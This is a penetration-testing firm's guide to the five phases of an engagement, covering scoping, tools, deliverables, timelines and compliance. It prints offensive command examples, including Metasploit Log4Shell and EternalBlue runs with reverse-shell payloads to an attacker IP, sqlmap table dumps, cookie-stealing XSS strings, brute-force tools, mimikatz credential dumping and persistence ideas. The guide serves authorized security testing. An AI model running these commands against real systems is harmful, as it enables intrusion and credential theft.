5 Penetration Testing Phases: Tools, Techniques & Timelines

Professional penetration testing follows a systematic five-phase methodology ensuring comprehensive security assessment. Each phase builds on the previous, progressing from information gathering through exploitation to detailed reporting. Understanding these phases helps organizations prepare for engagements and security teams execute thorough assessments.

This guide breaks down each penetration testing phase with specific tools, techniques, commands, timelines, and deliverables used by professional security testers. Based on industry frameworks including PTES (Penetration Testing Execution Standard), OSSTMM, and NIST SP 800-115.

The 5 Penetration Testing Phases

Standard penetration tests follow these sequential phases:

1. Planning and Reconnaissance: Define scope, gather intelligence
2. Scanning and Enumeration: Identify systems, services, vulnerabilities
3. Exploitation: Attempt to gain unauthorized access
4. Post-Exploitation and Maintaining Access: Escalate privileges, establish persistence
5. Reporting and Analysis: Document findings, provide remediation guidance

Typical penetration testing engagement durations:

• Network penetration test: 5-10 days
• Web application test: 7-14 days
• Full infrastructure assessment: 15-30 days
• Red team engagement: 30-90 days

Phase 1: Planning and Reconnaissance

The planning phase establishes engagement rules, scope, and objectives while reconnaissance gathers intelligence about target systems. This phase typically consumes 15-20% of total engagement time.

Pre-Engagement Activities

Scoping and Rules of Engagement (ROE)

Organizations and testers define:

• Testing scope: IP ranges, domains, applications, systems included/excluded
• Testing methodology: Black box (no knowledge), white box (full access), or grey box (partial knowledge)
• Testing constraints: Time windows, restricted systems, production limitations
• Legal authorization: Signed agreements, authorization letters, emergency contacts
• Communication protocols: Status updates, finding notification, emergency procedures

Goal Definition:

Clear objectives guide testing focus:

• Compliance validation (PCI DSS, HIPAA, SOC 2 penetration testing requirements)
• Vulnerability identification before major deployments
• Security control effectiveness validation
• Incident response capability testing
• Crown jewel protection assessment (specific data or systems)

Passive Reconnaissance

Passive reconnaissance gathers publicly available information without directly interacting with target systems. This avoids detection and provides attacker perspective.

OSINT (Open Source Intelligence) Techniques:

• DNS Enumeration: Identify subdomains, mail servers, nameservers using tools like `dig`, `nslookup`, `dnsrecon`
• WHOIS Lookups: Gather registration information, contact details, IP ranges
• Search Engine Reconnaissance: Google dorking discovers exposed files, login pages, configuration files
• Social Media Analysis: LinkedIn reveals employee roles, technologies used, organizational structure
• Public Records: SEC filings, job postings, press releases reveal infrastructure details
• Code Repositories: GitHub, GitLab may contain credentials, API keys, architecture documentation

Example Reconnaissance Commands:

DNS subdomain enumeration:

dnsrecon -d example.com -t std
subfinder -d example.com -silent
amass enum -d example.com

Technology fingerprinting:

whatweb https://example.com
wappalyzer https://example.com
builtwith https://example.com

Active Reconnaissance

Active reconnaissance directly interacts with target systems, gathering detailed information about infrastructure, services, and potential vulnerabilities.

Network Discovery:

Identify live hosts on target networks:

nmap -sn 192.168.1.0/24
masscan -p1-65535 192.168.1.0/24 --rate=10000
fping -a -g 192.168.1.0/24

Port Scanning:

Identify open ports and running services:

nmap -sS -sV -p- -T4 target.com
nmap -sC -sV -O target.com
nmap -A -p- target.com --script=vuln

Common flags explained:

• -sS: SYN scan (stealthy half-open scan)
• -sV: Version detection
• -p-: Scan all 65,535 ports
• -A: Aggressive scan (OS detection, version detection, script scanning)
• -O: OS fingerprinting
• --script=vuln: Vulnerability detection scripts

Phase 1 Deliverables

• Signed Rules of Engagement document
• Detailed scope document with IP ranges, domains, applications
• Reconnaissance report including identified assets, technologies, potential attack surfaces
• Network topology diagram (if sufficient information gathered)

Timeline: 1-3 days for typical engagement

Phase 2: Scanning and Enumeration

Scanning identifies vulnerabilities, misconfigurations, and weaknesses in discovered systems. This phase generates most of the raw data analyzed during exploitation.

Vulnerability Scanning

Automated vulnerability scanners test systems for known vulnerabilities:

Network Vulnerability Scanners:

• Nessus: Commercial scanner with comprehensive vulnerability database
• OpenVAS: Open-source alternative to Nessus
• Qualys: Cloud-based vulnerability scanning
• Rapid7 Nexpose: Enterprise vulnerability management

Web Application Scanners:

• Burp Suite Pro: Industry-standard web app security testing
• OWASP ZAP: Free, open-source web app scanner
• Acunetix: Automated web vulnerability scanner
• Nikto: Web server scanner identifying dangerous files, outdated software

Example Nikto scan:

nikto -h https://target.com -ssl -o report.html

Service Enumeration

Deep analysis of running services reveals configuration details, software versions, and potential vulnerabilities.

SMB Enumeration (Windows networks):

enum4linux -a target-ip
smbclient -L //target-ip -N
nmap --script smb-enum-shares,smb-enum-users target-ip

SNMP Enumeration:

snmpwalk -v2c -c public target-ip
onesixtyone -c community-strings.txt target-ip

Directory and File Enumeration:

Discover hidden directories, files, and administrative interfaces:

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -u https://target.com/FUZZ -w wordlist.txt
dirsearch -u https://target.com -e php,asp,aspx,jsp

Manual Analysis

Experienced penetration testers supplement automated tools with manual analysis:

• Configuration Review: Analyze web server configurations, SSL/TLS settings, security headers
• Logic Flaw Identification: Test business logic for authorization bypasses, privilege escalation paths
• Custom Application Analysis: Proprietary software requires manual code review, input validation testing
• False Positive Elimination: Validate scanner findings, eliminate incorrect detections

Manual testing discovers vulnerabilities automated scanners miss. Professional penetration testing combines automated and manual techniques for comprehensive coverage.

Phase 2 Deliverables

• Comprehensive vulnerability scan reports
• Service enumeration data (versions, configurations, banner grabs)
• Prioritized vulnerability list categorized by severity
• Preliminary exploitation plan for Phase 3

Timeline: 2-4 days depending on scope size

Phase 3: Exploitation

Exploitation attempts to gain unauthorized access by leveraging identified vulnerabilities. Professional testers prioritize exploits by risk, impact, and success probability.

Exploitation Frameworks

Metasploit Framework

Most widely-used exploitation framework with thousands of exploit modules:

msfconsole
search cve:2021-44228
use exploit/multi/http/log4shell_header_injection
set RHOSTS target.com
set LHOST attacker-ip
exploit

Metasploit provides:

• Pre-built exploit modules for known vulnerabilities
• Payload generation (reverse shells, Meterpreter sessions)
• Post-exploitation modules (privilege escalation, lateral movement)
• Auxiliary modules (scanners, fuzzers, denial-of-service)

Common Exploitation Techniques

Web Application Exploitation

SQL Injection example:

sqlmap -u "http://target.com/page?id=1" --dbs --batch
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump

Cross-Site Scripting (XSS) testing:

<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Command Injection testing:

; ls -la
| whoami
& net user
`id`

Network Service Exploitation

EternalBlue (MS17-010) exploitation:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target-ip
set payload windows/x64/meterpreter/reverse_tcp
exploit

Password Attacks

Brute force authentication:

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target-ip
medusa -h target-ip -u admin -P passwords.txt -M ftp
ncrack -U users.txt -P passwords.txt target-ip:3389

Password hash cracking:

john --wordlist=rockyou.txt hashes.txt
hashcat -m 1000 -a 0 ntlm-hashes.txt wordlist.txt

Exploitation Best Practices

• Start Low-Risk: Begin with non-destructive exploits, escalate only if authorized
• Document Everything: Log all commands, timestamps, and results for reporting
• Avoid Production Impact: Test exploits in controlled environments before production systems
• Communication: Notify client immediately upon successful exploitation of critical systems
• Backup Data: Take snapshots before exploitation to enable rollback if needed

Organizations conducting penetration tests should establish clear success criteria. Is the goal demonstrating single vulnerability exploitation, or achieving specific objectives like data access or privilege escalation?

Phase 3 Deliverables

• Exploitation attempt log (successful and failed)
• Proof-of-concept exploits demonstrating vulnerability severity
• Screenshots and command output proving successful exploitation
• Interim status reports for critical findings

Timeline: 3-7 days depending on exploitation complexity

Phase 4: Post-Exploitation and Maintaining Access

After initial compromise, testers escalate privileges, move laterally across networks, and establish persistent access simulating advanced persistent threat (APT) behavior.

Privilege Escalation

Linux Privilege Escalation:

Enumeration scripts identify escalation vectors:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t

linpeas.sh
sudo -l
find / -perm -4000 -type f 2>/dev/null

Common Linux escalation techniques:

• SUID binary exploitation
• Kernel exploits (DirtyCow, overlayfs)
• Sudo misconfiguration
• Cron job hijacking
• Writable service configuration files

Windows Privilege Escalation:

winPEAS.exe
whoami /priv
net user
net localgroup administrators

Common Windows escalation techniques:

• Token impersonation (Potato attacks)
• Service misconfiguration (unquoted service paths, weak permissions)
• Stored credential exploitation
• DLL hijacking
• Exploiting unpatched systems

Lateral Movement

After compromising one system, testers pivot to additional systems using various techniques:

Pass-the-Hash Attacks:

pth-winexe -U domain/user%hash //target-ip cmd
crackmapexec smb target-range -u user -H hash --exec-method smbexec

Credential Dumping:

Extract passwords and hashes from compromised systems:

mimikatz.exe
sekurlsa::logonpasswords
lsadump::sam
hashdump

Pivoting:

Use compromised systems as jump points to reach isolated network segments:

ssh -D 9050 user@compromised-host
proxychains nmap -sT internal-network
meterpreter > autoroute -s internal-subnet
meterpreter > portfwd add -l 3389 -p 3389 -r internal-host

Persistence Mechanisms

Persistence ensures access survives reboots and logout, simulating APT behavior:

Linux Persistence:

• SSH key injection: Add attacker public key to ~/.ssh/authorized_keys
• Cron jobs: Schedule reverse shell connections
• Backdoored system binaries
• Startup script modification

Windows Persistence:

• Registry Run keys modification
• Scheduled tasks creation
• Service creation or modification
• WMI event subscriptions
• DLL side-loading

Professional penetration testers typically avoid aggressive persistence mechanisms in production environments, documenting theoretical persistence rather than implementing it to minimize risk.

Data Exfiltration

Testers demonstrate ability to steal sensitive data (while respecting data handling agreements):

• Database extraction (customer PII, financial records)
• File system searching for sensitive documents
• Email archive access
• Source code repository access
• Cloud storage enumeration

Data handling protocols prevent actual data theft. Testers typically:

• Screenshot evidence rather than copying full datasets
• Hash files to prove access without exfiltration
• Count records accessed rather than extracting content
• Use synthetic test data when possible

Phase 4 Deliverables

• Post-exploitation activity log
• Privilege escalation paths documented
• Lateral movement map showing compromised systems
• Evidence of data access (screenshots, record counts)
• Persistence mechanism documentation

Timeline: 2-5 days depending on network complexity

Phase 5: Reporting and Analysis

Final phase synthesizes findings into comprehensive reports guiding remediation. Professional reports balance technical detail for security teams with executive summaries for business stakeholders.

Report Components

Executive Summary

Non-technical overview for leadership:

• Engagement objectives and scope
• High-level findings summary
• Overall risk assessment
• Strategic recommendations
• Comparison to previous assessments (if applicable)

Technical Findings

Detailed vulnerability documentation including:

• Vulnerability Description: What the vulnerability is, how it works
• Severity Rating: Critical/High/Medium/Low based on CVSS or organizational risk matrix
• Affected Systems: Complete list of vulnerable systems, applications, or configurations
• Exploitation Proof: Screenshots, command output, or video demonstrating exploitation
• Impact Analysis: Potential consequences if exploited by attackers
• Remediation Guidance: Specific, actionable steps to fix vulnerability
• References: CVE numbers, vendor advisories, security research

Attack Narrative

Chronological story showing how attacker progresses from initial access to objectives:

1. Initial reconnaissance findings
2. Vulnerability identification
3. Exploitation and initial compromise
4. Privilege escalation
5. Lateral movement path
6. Objective achievement (data access, domain admin, etc.)

This narrative helps organizations understand real-world attack chains beyond isolated vulnerabilities.

Remediation Prioritization

Professional reports prioritize fixes based on:

• Risk Severity: CVSS scores supplemented by business context
• Exploitability: Publicly available exploits, ease of exploitation
• Asset Criticality: Business impact of compromised systems
• Remediation Effort: Quick wins vs. architectural changes

Typical remediation timeline recommendations:

• Critical: Immediate (within 7 days)
• High: 30 days
• Medium: 90 days
• Low: Next maintenance cycle

Remediation Validation

Many penetration testing engagements include remediation validation (retesting):

• Client fixes identified vulnerabilities
• Testers validate fixes are effective
• Updated report confirms remediation
• Remaining issues documented if fixes incomplete

Retesting typically occurs 30-60 days after initial report delivery, allowing time for patches, configuration changes, and infrastructure modifications.

Deliverables Presentation

Report delivery includes:

• Written Report: Comprehensive PDF documenting all findings
• Executive Briefing: Presentation for leadership highlighting key risks
• Technical Debrief: Detailed walkthrough with IT/security teams
• Remediation Consultation: Ongoing support answering questions about fixes
• Raw Data: Scanner outputs, screenshots, logs for technical teams

Phase 5 Deliverables

• Final penetration test report (executive + technical sections)
• Findings matrix/spreadsheet for tracking remediation
• Executive presentation deck
• Supporting evidence (screenshots, videos, logs)
• Remediation roadmap with prioritized fixes

Timeline: 3-7 days for report writing and presentation

Penetration Testing Methodologies

Industry-standard methodologies guide systematic testing:

PTES (Penetration Testing Execution Standard)

Comprehensive framework covering pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

OWASP Testing Guide

Specifically for web application security testing, covering authentication, authorization, session management, input validation, and business logic flaws.

NIST SP 800-115

Technical guide to information security testing published by National Institute of Standards and Technology, commonly used for federal compliance.

OSSTMM (Open Source Security Testing Methodology Manual)

Scientific methodology for security testing and analysis, focusing on operational security metrics.

Compliance-Driven Testing

Many organizations conduct penetration tests for compliance:

PCI DSS

• Annual network penetration test required
• After significant infrastructure changes
• Both internal and external testing required
• Segmentation testing validates cardholder data isolation

HIPAA

• No explicit penetration testing requirement
• Risk assessments should include vulnerability testing
• Many covered entities conduct annual assessments

SOC 2

• Auditors expect regular penetration testing
• Testing frequency based on risk assessment
• Remediation validation required

Organizations requiring compliance assistance should ensure penetration tests meet specific regulatory requirements, including report format and auditor expectations.

Choosing a Penetration Testing Provider

When selecting penetration testing services:

• Certifications: Look for OSCP, GPEN, CEH, GWAPT, GCPN certified testers
• Methodology: Ensure adherence to PTES, OWASP, or NIST standards
• Experience: Industry-specific experience (healthcare, finance, etc.)
• Report Quality: Request sample reports evaluating clarity and actionability
• Insurance: Verify professional liability and cyber liability coverage
• NDA and Data Handling: Robust confidentiality and data protection agreements
• Tooling: Combination of commercial tools, open-source tools, and custom scripts
• Communication: Responsive during engagement, immediate notification of critical findings

Continuous Security Testing

Modern security programs extend beyond annual penetration tests:

• Continuous Vulnerability Management: Ongoing scanning identifying vulnerabilities as they emerge
• Bug Bounty Programs: Crowdsourced security research incentivizing external researchers
• Red Team Exercises: Advanced adversary simulations testing detection and response
• Purple Team Operations: Collaborative exercises improving defensive capabilities
• Automated Security Testing: Integration into CI/CD pipelines catching issues before production

Organizations with mature security programs conduct quarterly or semi-annual penetration tests supplemented by continuous monitoring.

Post-Test Actions

Maximizing penetration test value requires disciplined follow-through:

1. Prioritize Remediation: Address critical findings within recommended timeframes
2. Track Progress: Use findings matrix tracking fix status, ownership, target dates
3. Request Retesting: Validate fixes are effective before considering findings resolved
4. Update Security Controls: Apply lessons learned improving detection, response, architecture
5. Train Teams: Use findings educating developers, administrators about secure practices
6. Measure Improvement: Compare results across tests tracking security posture improvement

subrosa conducts comprehensive penetration testing following industry-standard methodologies (PTES, OWASP, NIST SP 800-115) with OSCP and GPEN certified testers. Our engagements include detailed technical reports, executive briefings, and remediation support ensuring organizations effectively address identified risks. We provide specialized testing across network infrastructure, web applications, wireless networks, cloud environments, and API security.